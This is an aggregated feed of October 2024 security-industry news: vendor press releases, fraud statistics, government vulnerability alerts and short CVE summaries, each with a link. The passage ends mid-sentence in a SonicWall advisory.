19% Increase in Consumer and Retail Fraud in the Year Ending June 2024
2024-10-24T15:00:00Z | 1729782000

Chad Reimers, general manager of fraud & ID at TransUnion in the UK, comments on the recent Office for National Statistics’ Crime in England and Wales Statistics:"The latest Crime in England and Wales figures from the Office for National Statistics have revealed that while overall volume of incidents of fraud showed no significant change in the year ending June 2024, there was a 19% increase in consumer and retail fraud. This correlates with – and continues - recent trends observed in similar sectors via TransUnion’s State of Omnichannel Fraud Report, where we have seen risky transactions rise by 33% in Retail and by nearly 10% in the Communities sector (including market-places and online dating). This is also consistent with recent stats comparing H1-24 to H1-23 published by UK Finance (16% increase in total cases) and Cifas (15%), demonstrating that more efforts continue to be required to drive awareness for consumers and for organisations to implement the right onboarding and monitoring controls, using a range of data signals and technology.    "Over the past year, the fraud landscape has continued to evolve, and we have seen shifts in fraudsters targeting retail and e-commerce sectors, particularly through chargebacks, delivery fraud, and a cross-over into the telco sector via handset delivery scams. Often these techniques then impact consumers of financial services organisations via the use of mule accounts and authorised push payment scams. Organisations need to ensure they are building data-informed customer journeys, which not only identify potential fraud risk, but also aim to increase trust with consumers, based on a holistic understanding of their identity, digital attributes, and relevant device footprints.”

https://newsroom.transunion.co.uk/19-increase-in-consumer-and-retail-fraud-in-the-year-ending-june-2024/
Xerox Printers Vulnerability Puts Data Security at Risk
2024-10-24T12:40:49Z | 1729773649

Cybersecurity experts are raising concerns over a newly discovered vulnerability in Xerox printers that could

https://virtualattacks.com/xerox-printers-vulnerability-puts-data-security-at-risk/
Cisco News in 60 Seconds: What you need to know about WebexOne 2024
2024-10-24T12:00:00Z | 1729771200

Catch up on all the latest news from WebexOne 2024. See how Cisco and Apple have come together to create immersive video experiences.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m10/cisco-news-in-60-seconds-what-you-need-to-know-about-webexone-2024.html
TransUnion appoints Madhusudan Kejriwal as CEO for UK and Europe
2024-10-24T07:30:00Z | 1729755000

TransUnion, a global information and insights company, has today announced the appointment of Madhusudan “Madhu” Kejriwal as its new chief executive officer for UK and Europe.  Kejriwal will officially join TransUnion on January 2, 2025. The appointment is subject to the required regulatory approvals. Kejriwal started his career with Capital One in Fraud & Credit Risk and was subsequently with HSBC for 20 years working in a series of leadership roles, including EVP, Head of Consumer Products, Propositions & Analytics for HSBC Mexico and MD, Group & UK Head of Cards and Personal Loans for HSBC. During his tenure at HSBC he helped steer the organisation through some of its biggest challenges across different markets. Kejriwal holds a bachelor’s degree in Accounting and Economics and did his MBA in Finance at the Indian Institute of Management (IIM), Bangalore.Having led TransUnion’s European business as interim UK and Europe CEO for the last 12 months, Mark Horsey will remain in post until Kejriwal’s arrival. He will then remain with TransUnion, working in an advisory capacity across the organisation’s international business, including Europe – ensuring an orderly handover and that the business retains Horsey’s extensive talent and experience.  Commenting on his appointment, Kejriwal said: “I believe we are at the start of the next industrial revolution, where data and insights will increasingly become the cornerstones of economic and social development. This makes it an exciting time for TransUnion as it is set to bring new products and services to the UK market. Personally, I am really excited at the prospect of leading an organisation that is committed to helping our partner businesses benefit from an even greater level of data and insight and be their trusted advisor through this journey. I am passionate about growth and developing teams, and I’m looking forward to building on the strong foundations laid by Mark and the team that will enable us to capitalise on the great opportunities ahead.” Todd Skinner, International President of TransUnion commented: “Madhu is an exceptional talent and brings with him a wealth of experience and expertise. He is a widely recognised industry expert in banking and payments, so we’re delighted to welcome his leadership to our UK-led operations. As a previous user of TransUnion services, he is ideally positioned to lead the delivery of the wider global TransUnion solution set to benefit our clients and the consumers we serve, delivering on our mission of Information for Good. Given his background of strategic leadership and extensive experience in managing large and diverse teams, Madhu will be a great asset to TransUnion and we’re delighted to confirm his appointment as CEO for UK and Europe.”

https://newsroom.transunion.co.uk/transunion-appoints-madhusudan-kejriwal-as-ceo-for-uk-and-europe/
Information security development support for 313 companies vital to society
2024-10-24T05:24:28Z | 1729747468

During August 2024, the Finnish Transport and Communications Agency Traficom has granted a total appropriation of EUR 6 million to support the development of information security. Support for the development of information security was applied for from the Finnish Transport and Communications Agency Traficom as of 1 December 2022. The aid was granted for 313 companies in total vital to society. The aid granted ranges from EUR 371 to EUR 100,000.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-development-support-313-companies-vital-society
Information security development support for 313 companies vital to society
2024-10-24T05:24:28Z | 1729747468

During August 2024, the Finnish Transport and Communications Agency Traficom has granted a total appropriation of EUR 6 million to support the development of information security. Support for the development of information security was applied for from the Finnish Transport and Communications Agency Traficom as of 1 December 2022. The aid was granted for 313 companies in total vital to society. The aid granted ranges from EUR 371 to EUR 100,000.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-development-support-313-companies-vital-society
High Threat Security Alert (A24-10-22): Multiple Vulnerabilities in Fortinet Products
2024-10-24T04:00:00Z | 1729742400

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-10-23): Multiple Vulnerabilities in Cisco Products
2024-10-24T04:00:00Z | 1729742400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Scaling AI Risk Mitigation Across Cybersecurity Platforms
2024-10-23T19:12:15Z | 1729710735

As artificial intelligence (AI) becomes increasingly woven into business operations, security teams face a complex challenge: developing scalable risk management strategies that address the nuances of this emerging technology. This challenge is particularly pronounced when focused on the risks inherent in AI model development and usage, especially as they span complex environments such as on-premises systems, cloud infrastructure, or hybrid networks. In particular, innovations like Retrieval-Augmented Generation (RAG) allow even small LLMs to outperform the largest LLMs by allowing them to reference documents as they generate responses. And as AI becomes more embedded in corporate workflows, customers need continuity and reliability of access to it. As a result, security teams need cybersecurity solutions that can deliver dynamic and robust security to protect the proprietary data and sensitive access often granted to AI without compromising productivity or limiting scalability. Let’s dive into this challenge and explore three proven strategies to find this security sweet spot:

https://www.zentera.net/blog/ai-risk-mitigation-cybersecurity
SophosAI team presents three papers on AI applied to cybersecurity at CAMLIS
2024-10-23T15:02:39Z | 1729695759

On October 24 and 25, SophosAI presents ideas on how to use models large and small—and defend against malignant ones.

https://news.sophos.com/en-us/2024/10/23/sophosai-team-presents-three-papers-on-ai-applied-to-cybersecurity-at-camlis/
Mobile devices and business travellers (ITSAP.00.087)
2024-10-23T13:25:10Z | 1729689910

https://cyber.gc.ca/en/guidance/mobile-devices-and-business-travellers-itsap00087
Concealing payloads in URL credentials
2024-10-23T12:59:05Z | 1729688345

Last year Johan Carlsson discovered you could conceal payloads inside the credentials part of the URL . This was fascinating to me especially because the payload is not actually visible in the URL in

https://portswigger.net/research/concealing-payloads-in-url-credentials
Cisco Unveils New AI Innovations to Amplify the Employee Experience
2024-10-23T12:45:00Z | 1729687500

Cisco launches new AI solutions to advance collaboration and empower employees with equitable and exceptional experiencesMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m10/cisco-unveils-new-ai-innovations-to-amplify-the-employee-experience-and-future-proof-the-workplace.html
Cisco Announces New Webex AI Agent and AI Solutions for the Contact Center to Transform Customer Experiences
2024-10-23T12:45:00Z | 1729687500

Cisco’s Webex AI Agent automates contact center inquiries with conversational intelligence for quick and effective issue resolutionMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m10/cisco-announces-new-webex-ai-agent-and-ai-solutions-for-the-contact-center-to-transform-customer-experiences.html
How Cisco is using Apple Vision Pro to create the next evolution of spatial collaboration
2024-10-23T12:35:00Z | 1729686900

Cisco is committed to providing the best possible experiences for Webex users on Apple devices. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m10/innovating-an-energy-future-that-smart-secure-and-more-sustainable0.html
Security Alert (A24-10-21): Multiple Vulnerabilities in Google Chrome
2024-10-23T04:00:00Z | 1729656000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA D3D10 Driver Shader Functionality LD instruction out-of-bounds read vulnerability
2024-10-23T00:00:00Z | 1729641600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2012
NVIDIA D3D10 Driver Shader Functionality SAMPLE out-of-bounds read vulnerability
2024-10-23T00:00:00Z | 1729641600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1955
NVIDIA D3D10 Driver Shader Functionality out-of-bounds read vulnerability due to excessive loop iteration
2024-10-23T00:00:00Z | 1729641600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2013
NVIDIA D3D10 Driver Shader Functionality MOV instruction out-of-bounds read vulnerability
2024-10-23T00:00:00Z | 1729641600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2015
NVIDIA D3D10 Driver Shader Functionality STORE_STRUCTURED instruction out-of-bounds read vulnerability
2024-10-23T00:00:00Z | 1729641600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2014
Security alert CVE-2024-45519: Stormshield Products Response
2024-10-22T15:59:12Z | 1729612752

A new critical unauthorized access vulnerability impacting the Zimbra suite has been reported. It has been assigned the reference CVE-2024-45519 and a CVSS 3.1 score of 9.8. The Stormshield Customer Security Lab details our protection offerings. It should be noted that this vulnerability has public... The post Security alert CVE-2024-45519: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2024-45519-stormshield-products-response/
Cloud-based deployment of content filtering for more than 6 million subscribers, including Children, Schools and Businesses.
2024-10-21T16:25:10Z | 1729527910

FORT COLLINS, Colo., Oct. 8, 2024 /PRNewswire-PRWeb/ — Secure64 Software Corporation,creators of purpose-built security and DNS solutions, announced today another successfuldeployment of its LineGuard solution to provide DNS-based content filtering.This deployment was for a major carrier and replaced an already operational Cisco Umbrellaplatform in under six weeks. The carrier benefited from rapid testing and deploymenttimeframes […]

https://secure64.com/2024/10/21/cloud-based-deployment-of-content-filtering-for-more-than-6-million-subscribers-including-children-schools-and-businesses/
Graylog Redefines SIEM with More Efficient and Effective Threat Detection
2024-10-21T13:15:49Z | 1729516549

Graylog, a leader in Threat Detection, Investigation, and Response (TDIR), today unveiled significant security advancements to drive smarter, faster, and more cost-efficient security operations. The company’s latest capabilities include advanced data routing, asset-based risk scoring, and AI-generated investigation reports.  The post Graylog Redefines SIEM with More Efficient and Effective Threat Detection appeared first on Graylog.

https://graylog.org/news/graylog-redefines-siem-with-more-efficient-and-effective-threat-detection/
How In-Person Meetings Fast-Tracked Our vPPA Negotiations in Europe
2024-10-21T13:00:00Z | 1729515600

In-person interactions can build trust, foster collaboration, and achieve efficiency ? especially for complex negotiations ? even in the post-pandemic world.

https://www.akamai.com/blog/sustainability/2024/oct/how-in-person-meetings-fast-tracked-vppa-negotiations-europe
UK and US issue alert over cyber actors working on behalf of Iranian state
2024-10-21T12:29:22Z | 1729513762

Joint advisory encourages individuals at higher risk of targeted phishing to follow mitigation advice and sign up for NCSC's cyber defence services.

https://www.ncsc.gov.uk/news/uk-us-issue-alert-cyber-actors-behalf-iranian-state-carry-targeted-phishing-attacks
Are You in Sync with Your Security Vendor?
2024-10-21T12:02:04Z | 1729512124

In today’s rapidly evolving threat landscape, the relationship between a security vendor and its customer is more critical than ever. As information security professionals, the pressure to ensure robust security postures is constant. Yet, the tools and services relied upon often fall short due to a fundamental disconnect between vendors and their customers. Traditional security... The post Are You in Sync with Your Security Vendor? appeared first on Cato Networks.

https://www.catonetworks.com/blog/are-you-in-sync-with-your-security-vendor/
Going Beyond SASE with Digital Experience Monitoring (DEM)
2024-10-21T08:57:23Z | 1729501043

The post Going Beyond SASE with Digital Experience Monitoring (DEM) appeared first on Cato Networks.

https://www.catonetworks.com/resources/digital-experience-monitoring-dem-white-paper/
Deploying Zero Trust Security Using a SASE Platform
2024-10-21T08:13:33Z | 1729498413

The post Deploying Zero Trust Security Using a SASE Platform appeared first on Cato Networks.

https://www.catonetworks.com/resources/deploying-zero-trust-security-using-a-sase-platform/
Call and Register ? Relay Attack on WinReg RPC Client
2024-10-19T15:00:00Z | 1729350000

https://www.akamai.com/blog/security-research/2024/oct/winreg-relay-vulnerability
Arista-20 Years of Growth and Innovation
2024-10-18T13:00:00Z | 1729256400

Today marks the 20th anniversary of Arista! Over that time, our company has grown from nothing to #1 in Data Center Ethernet, a highly profitable $100+ billion S&P 500 company doing $6+ billion in annual revenue.

https://blogs.arista.com/blog/20-years-of-growth-and-innovation
CVE-2024-47142
2024-10-18T11:01:00Z | 1729249260

CWE-284: Improper access control A network-adjacent authenticated attacker may perform unintended operations

https://claroty.com/team82/disclosure-dashboard/cve-2024-47142
CVE-2024-45837
2024-10-18T10:59:00Z | 1729249140

CWE-321: Use of hard-coded cryptographic key A network-adjacent unauthenticated attacker may log in to SFTP service and obtain and/or manipulate unauthorized files

https://claroty.com/team82/disclosure-dashboard/cve-2024-45837
CVE-2024-39290
2024-10-18T10:58:00Z | 1729249080

CWE-522: Insufficiently protected credentials A network-adjacent unauthenticated attacker may obtain sensitive information such as a username and its password in the address book

https://claroty.com/team82/disclosure-dashboard/cve-2024-39290
CVE-2024-31408
2024-10-18T10:57:00Z | 1729249020

CWE-78: OS command injection A network-adjacent authenticated attacker may execute an arbitrary OS command with root privileges by sending a specially crafted request

https://claroty.com/team82/disclosure-dashboard/cve-2024-31408
Russian foreign intelligence poses global threat with cyber campaign exploiting established vulnerabilities
2024-10-18T09:04:25Z | 1729242265

Organisations are encouraged to bolster their cyber defences and follow advice set out within advisory.

https://www.ncsc.gov.uk/news/russian-foreign-intelligence-poses-global-threat-with-cyber-campaign-exploiting-established-vulnerabilities
TransUnion UK Pledges to be Menopause Friendly, Expanding Its Existing Support for Employees
2024-10-18T07:30:00Z | 1729236600

In recognition of World Menopause Day on 18 October, TransUnion UK, a global information and insights company and one of the UK’s leading credit reference agencies, has pledged to build on its existing broad support offering for people going through the menopause, by becoming a Menopause Friendly Committed Employer.According to Menopause Friendly, 18% of the workforce is menopausal and 35% have had to take time off work to manage their symptoms, affecting productivity and self-esteem. Furthermore, one in four people going through menopause considers quitting work due to the severity of their symptoms, while one in 10 actually resign, as they can see no other way to cope with what they’re going through.i This trend sees employees with experience and institutional memory leaving the workplace, despite having significant value to add and benefit to gain from being part of the active workforce.“Menopause isn’t taboo, it’s a perfectly normal process that’s unique to every individual.  It’s important to know the signs and coping strategies so that we can help one another,” said Kaushik Gopalan, chief human resources officer for TransUnion UK. “Many of our colleagues are working through menopause or supporting someone who is on that journey, whether it’s a friend, family member or a team member at work. Everyone knows someone who may need a little more support during this time, which is why we’ve established a number of groups and resources to help those on the journey, and to show our colleagues how they can help those that are close to them.TransUnion UK offers a range of support tools including its helpful guide, ‘Being you at TU: The Menopause’, which is easily accessible to all colleagues. The guide provides insights on symptoms, coping strategies and how to access support, and also provides frameworks for leaders and how they can best support someone who is on the menopause journey. Additionally, TransUnion colleagues in Europe have access to a short e-learning series that covers menopause basics, HRT and alternative therapies.The business’s support for people going through menopause extends well beyond reading matter and coursework – a team of Menopause Champions is available to colleagues across the business. Including male and female employees, Menopause Champions can guide those seeking support to the most relevant resource, along with being available to advise leaders on where and how to find the most appropriate support for their team members. The business’s team of Mental Health First Aiders offer an additional support resource too.The company’s Leeds office features a ‘cool’ room, where those experiencing hot flushes can go to manage their symptoms. Employees and leaders are also warmly encouraged to seek and implement other reasonable supportive adjustments, such as making it possible for someone to sit near a window to benefit from a cool draft, or to work flexible hours to allow for changed sleep patterns.TransUnion UK offers a wealth of other resources to support people going through menopause, including a downloadable symptoms diary and other comprehensive knowledge and planning resources.Notes:i Menopause Friendly - Menopause support at work: why it’s so crucial now

https://newsroom.transunion.co.uk/transunion-uk-pledges-to-be-menopause-friendly-expanding-its-existing-support-for-employees/
Security Alert (A24-10-20): Multiple Vulnerabilities in Microsoft Edge
2024-10-18T04:00:00Z | 1729224000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Why Modern Layer 7 DDoS Protections Are Crucial for Web Security in 2024
2024-10-17T13:00:00Z | 1729170000

A new Akamai white paper explains why you need to prioritize modern Layer 7 DDoS protection ? and details how you can guide your security efforts.

https://www.akamai.com/blog/security/2024/oct/why-modern-layer-7-ddos-protections-crucial-web-security-2024
Bangladesh Cyber Threat Landscape 2023
2024-10-17T11:37:14Z | 1729165034

https://www.cirt.gov.bd/bangladesh-ct-landscape-2023/
CVE-2024-49399
2024-10-17T11:08:00Z | 1729163280

CWE-306: MISSING AUTHENTICATION FOR CRITICAL FUNCTION The affected product is vulnerable to an attacker being able to use commands without providing a password which may allow an attacker to leak information. Successful exploitation of these vulnerabilities could allow an attacker to perform remote code execution, impersonate and send false information, or bypass authentication. Elvaco has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of M-Bus Metering Gateway CMe3100 are invited to contact Elvaco customer support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2024-49399
CVE-2024-49398
2024-10-17T11:07:00Z | 1729163220

CWE-434: UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE The affected product is vulnerable to unrestricted file uploads, which may allow an attacker to remotely execute code. Successful exploitation of these vulnerabilities could allow an attacker to perform remote code execution, impersonate and send false information, or bypass authentication. Elvaco has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of M-Bus Metering Gateway CMe3100 are invited to contact Elvaco customer support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2024-49398
CVE-2024-49397
2024-10-17T11:05:00Z | 1729163100

CWE-79: IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION('CROSS-SITE SCRIPTING') The affected product is vulnerable to a cross-site scripting attack which may allow an attacker to bypass authentication and takeover admin accounts. Successful exploitation of these vulnerabilities could allow an attacker to perform remote code execution, impersonate and send false information, or bypass authentication. Elvaco has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of M-Bus Metering Gateway CMe3100 are invited to contact Elvaco customer support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2024-49397
CVE-2024-49396
2024-10-17T11:04:00Z | 1729163040

CWE-522: INSUFFICIENTLY PROTECTED CREDENTIALS The affected product is vulnerable due to insufficiently protected credentials, which may allow an attacker to impersonate Elvaco and send false information. Successful exploitation of these vulnerabilities could allow an attacker to perform remote code execution, impersonate and send false information, or bypass authentication. Elvaco has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of M-Bus Metering Gateway CMe3100 are invited to contact Elvaco customer support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2024-49396
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now
2024-10-17T00:00:00Z | 1729123200

Joint U.S. and UK advisory identifies 24 vulnerabilities exploited by Russian state-sponsored APT 29, with GreyNoise detecting active probing on nine of these critical CVEs. Stay informed with real-time intelligence to prioritize patching and strengthen your organization's defenses against opportunistic cyber threats.

https://www.greynoise.io/blog/u-s-and-uk-warn-of-russian-cyber-threats-9-of-24-vulnerabilities-in-the-advisory-are-being-probed-right-now
Simplify Security and Enhance WAAP with Detection and Control in the AI Era
2024-10-16T13:00:00Z | 1729083600

Simplify operations without sacrificing control. Read how Akamai delivers a robust defense with innovations like Behavioral DDoS Engine and AI Assistant.

https://www.akamai.com/blog/security/2024/oct/simplify-security-enhance-waap-with-detection-control-ai-era
NCSC warns of widening gap between cyber threats and defence capabilities
2024-10-16T11:04:02Z | 1729076642

Dr Richard Horne, CEO NCSC calls for greater global resilience against online security threats at Singapore International Cyber Week.

https://www.ncsc.gov.uk/news/ncsc-warns-widening-gap-between-cyber-threats-and-defence-capabilities
NSFOCUS Exhibits at GovWare 2024
2024-10-16T06:55:38Z | 1729061738

Singapore, October 16, 2024 – NSFOCUS, a global leader in cybersecurity solutions, today exhibits at GovWare 2024, Asia’s premier cyber information and connectivity platform, taking place at Sands Expo and Convention Centre in Singapore. Founded in 2000, NSFOCUS has built a reputation for deep technical expertise and innovation capabilities. Since expanding into the international market […] The post NSFOCUS Exhibits at GovWare 2024 appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-exhibits-at-govware-2024/
Uuenes keskse volituste haldamise süsteemi Pääsuke kasutajaliides
2024-10-16T06:53:26Z | 1729061606

Oktoobri alguses läbis Pääsuke suurema UX/UI uuenduskuuri. Selle tingis ennekõike asjaolu, et nii Pääsukese kasutajate kui seal hallatavate volituste arv on kiiresti kasvanud.

https://ria.ee/uudised/uuenes-keskse-volituste-haldamise-susteemi-paasuke-kasutajaliides
Anonymous Sudan Takedown: Akamai's Role
2024-10-16T05:00:00Z | 1729054800

https://www.akamai.com/blog/security-research/2024/oct/anonymous-sudan-takedown-akamai-role-ddos
Security Alert (A24-10-18): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2024)
2024-10-16T04:00:00Z | 1729051200

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-19): Multiple Vulnerabilities in Google Chrome
2024-10-16T04:00:00Z | 1729051200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Meta and Arista Build AI at Scale
2024-10-15T17:48:32Z | 1729014512

We are excited to share that Meta has deployed the Arista 7700R4 Distributed Etherlink Switch (DES) for its latest Ethernet-based AI cluster. It's useful to reflect on how we arrived at this point and the strength of the partnership with Meta.

https://blogs.arista.com/blog/meta-and-arista-build-ai-at-scale
When SASE Meets DEM: Revolutionizing the User Experience
2024-10-15T11:30:00Z | 1728991800

In today’s fast-evolving business world, IT Teams must ensure seamless user experiences to stay competitive. As networks grow more complex, IT faces increasing challenges in identifying and resolving performance issues that impact user productivity and satisfaction. Cato Digital Experience Monitoring (DEM) addresses these challenges, helping IT ensure optimal user experiences.  Why the User Experience Is... The post When SASE Meets DEM: Revolutionizing the User Experience  appeared first on Cato Networks.

https://www.catonetworks.com/blog/when-sase-meets-dem/
National Cyber Security Centre's weekly review – 41/2024
2024-10-15T11:02:14Z | 1728990134

This week, we report on denial-of-service (DoS) attacks that are pestering organisations and their customers. We also look at the recently published national cybersecurity strategy.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-412024
National Cyber Security Centre's weekly review – 41/2024
2024-10-15T11:02:14Z | 1728990134

This week, we report on denial-of-service (DoS) attacks that are pestering organisations and their customers. We also look at the recently published national cybersecurity strategy.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-412024
The Importance of Protecting Active Directory from Attack: What’s at Stake?
2024-10-15T09:54:01Z | 1728986041

In this blog post, we will discuss the importance of protecting Active Directory from cyberattacks, the devastating consequences of an AD breach, and best practices to safeguard this critical component of your IT infrastructure. Certes DPRM has a proven deployed solution that protects Active Directory from the potential attacks defined in this article. The post The Importance of Protecting Active Directory from Attack: What’s at Stake? appeared first on Certes.

https://certes.ai/2024/10/15/protecting-active-directory/
Security Alert (A24-10-17): Vulnerability in Firefox
2024-10-15T04:00:00Z | 1728964800

Mozilla has published an advisory (MFSA2024-53) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Kolmapäeval toimuvad riikliku postkasti plaanilised hooldustööd
2024-10-14T09:41:46Z | 1728898906

Sel kolmapäeval, 16. oktoobril toimuvad riikliku postkasti plaanilised hooldustööd, millega seoses ei ole postkast kättesaadav. Hetkel on planeeritud katkestus ajavahemikus 00.01–23.59, kuid tööde kestus võib varieeruda.

https://ria.ee/uudised/kolmapaeval-toimuvad-riikliku-postkasti-plaanilised-hooldustood
Hillstone Networks Delivers on A visionary, AI-powered, and Accessible Cybersecurity Platform at GITEX 2024
2024-10-14T06:30:06Z | 1728887406

GITEX 2024: Hillstone Networks to Showcase Integrative Cybersecurity Solutions at Dubai, UAE Hillstone Networks, a leading provider of cybersecurity solutions, is sponsoring at GITEX, from 14-18 October 2024, with a fresh approach to bolstering cyber resilience for enterprise businesses, tackling the security gaps and complexities that confront CISOs and security experts. This innovative approach is built […] The post Hillstone Networks Delivers on A visionary, AI-powered, and Accessible Cybersecurity Platform at GITEX 2024 appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-delivers-on-a-visionary-ai-powered-and-accessible-cybersecurity-platform-at-gitex-2024/
High Threat Security Alert (A24-10-14): Multiple Vulnerabilities in GitLab
2024-10-14T04:00:00Z | 1728878400

GitLab has released 17.2.9, 17.3.5 and 17.4.2 to address multiple vulnerabilities in various versions of GitLab.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-15): Multiple Vulnerabilities in Microsoft Edge
2024-10-14T04:00:00Z | 1728878400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-16): Multiple Vulnerabilities in SonicWall Products
2024-10-14T04:00:00Z | 1728878400

SonicWall released security advisories to address multiple vulnerabilities in SonicWall systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Perspective on October?s Patch Tuesday 2024
2024-10-11T14:00:00Z | 1728655200

https://www.akamai.com/blog/security-research/2024/oct/akamai-perspective-patch-tuesday-october-2024
Hybrid work, children, and security: the benefits and risks
2024-10-11T12:00:00Z | 1728648000

Hybrid work is a great boon for family life. But organizations must ensure that parents, children, and sensitive data are safe from cybercrime.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m10/hybrid-work-children-and-security-the-benefits-and-risks.html
National Cyber Security Centre's weekly review – 39/2024
2024-10-11T11:27:22Z | 1728646042

This week, we report on the state of denial-of-service (DoS) attacks, ransomware and new scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-392024
National Cyber Security Centre's weekly review – 39/2024
2024-10-11T11:27:22Z | 1728646042

This week, we report on the state of denial-of-service (DoS) attacks, ransomware and new scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-392024
Privilege escalation in PAX POS terminals software
2024-10-11T11:00:00Z | 1728644400

Privilege escalation vulnerability (CVE-2023-42133) has been found in PAX Android based POS terminals.

https://cert.pl/en/posts/2024/10/CVE-2023-42133/
National Cyber Security Centre's weekly review – 40/2024
2024-10-11T06:19:24Z | 1728627564

This week, we report on domain names falling into the wrong hands, which has also been covered in the media. We explain the difference between a website and a domain name, and advise on how to properly manage and administer a domain name. Other topics include new ways of spreading the Lumma Stealer malware, the Digital Security Week and the start of Cyber Security Month, and protecting your SMS Sender ID.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-402024
National Cyber Security Centre's weekly review – 40/2024
2024-10-11T06:19:24Z | 1728627564

This week, we report on domain names falling into the wrong hands, which has also been covered in the media. We explain the difference between a website and a domain name, and advise on how to properly manage and administer a domain name. Other topics include new ways of spreading the Lumma Stealer malware, the Digital Security Week and the start of Cyber Security Month, and protecting your SMS Sender ID.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-402024
Auditing Gradio 5, Hugging Face’s ML GUI framework
2024-10-10T16:00:29Z | 1728576029

This is a joint post with the Hugging Face Gradio team; read their announcement here! You can find the full report with all of the detailed findings from our security audit of Gradio 5 here. Hugging Face hired Trail of Bits to audit Gradio 5, a popular open-source library that provides a web interface that […]

https://blog.trailofbits.com/2024/10/10/auditing-gradio-5-hugging-faces-ml-gui-framework/
StoneOS R11: Revolutionizing Network Security for the Modern Enterprise
2024-10-10T15:35:15Z | 1728574515

Hey there, cybersecurity enthusiasts and IT pros! Hillstone Networks has just dropped its latest bombshell – StoneOS R11, packed with features designed to tackle today’s evolving cyber threats while streamlining operations for your IT teams. From Zero Trust Network Access (ZTNA) for the Intranet to SD-WAN optimizations and cutting-edge threat protection, this release is all […] The post StoneOS R11: Revolutionizing Network Security for the Modern Enterprise appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/stoneos-r11-revolutionizing-network-security-for-the-modern-enterprise/
SonicWall SSL-VPN SMA1000 and Connect Tunnel Windows Client Affected By Multiple Vulnerabilities
2024-10-10T14:29:49Z | 1728570589

1) CVE-2024-45315 - SonicWALL SMA1000 Connect Tunnel Windows Client Link Following Denial-of-Service VulnerabilityThe Improper link resolution before file access ('Link Following') vulnerability in SonicWall Connect Tunnel (version 12.4.3.271 and earlier of Windows client) allows users with standard privileges to create arbitrary folders and files, potentially leading to local Denial of Service (DoS) attack. CVSS Score: 6.1 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H CWE-59: Improper Link Resolution Before File Access ('Link Following') 2) CVE-2024-45316 - SonicWALL SMA1000 Connect Tunnel Windows Client Link Following Local Privilege Escalation VulnerabilityThe Improper link resolution before file access ('Link Following') vulnerability in SonicWall Connect Tunnel (version 12.4.3.271 and earlier of Windows client) allows users with standard privileges to delete arbitrary folders and files, potentially leading to local privilege escalation attack. CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CWE-59: Improper Link Resolution Before File Access ('Link Following') 3) CVE-2024-45317 - Unauthenticated SMA1000 12.4.x Server-Side Request Forgery (SSRF) VulnerabilityUnauthenticated SMA1000 12.4.x Server-Side Request Forgery (SSRF) Vulnerability allows a remote unauthenticated 